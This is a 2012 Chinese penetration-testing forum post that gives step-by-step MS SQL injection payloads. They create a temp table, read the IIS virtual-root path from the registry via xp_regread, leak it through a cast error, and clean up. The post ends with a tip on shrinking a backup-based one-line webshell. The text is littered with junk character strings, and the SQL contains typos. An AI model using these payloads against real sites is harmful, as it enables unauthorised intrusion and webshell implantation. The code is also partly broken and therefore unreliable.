中国网络渗透测试联盟

标题: DB权限暴出网站物理路径代码 [打印本页]

作者: admin    时间: 2012-9-15 14:23
标题: DB权限暴出网站物理路径代码
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表) I# d) @- n! ]/ U, m0 o4 |! v1 g

, e/ s( o$ Z6 I0 y- k, [, p, r) B( i7 i8 [4 M. Q9 x4 K' j
  2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中
! w% {% q0 S1 T( o9 D1 b4 R9 E2 T  Z1 z" z; Q! K/ P! h

. _  ^7 w" F, t! Q6 F; R0 @8 e% n  3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段3 Y# x  k2 Z6 w3 ]( A) m- Y

9 m3 V, D- I: t' c* f/ V) w9 n' q5 n% R, ~' n# P. M, B
  4、drop table [jm_tmp]-- 删除此表。/ V) t* s& i/ L+ y+ F# c9 a% j* _

9 ?# p8 F: A' c1 s1 q( N4 ~- I' p$ I& Q9 q6 ]
另附上备分专用一句话$ Y' u! Q$ G  x9 ]/ Q; c
  加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.- o1 G" m+ V: ]2 p) G8 X$ t4 S





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2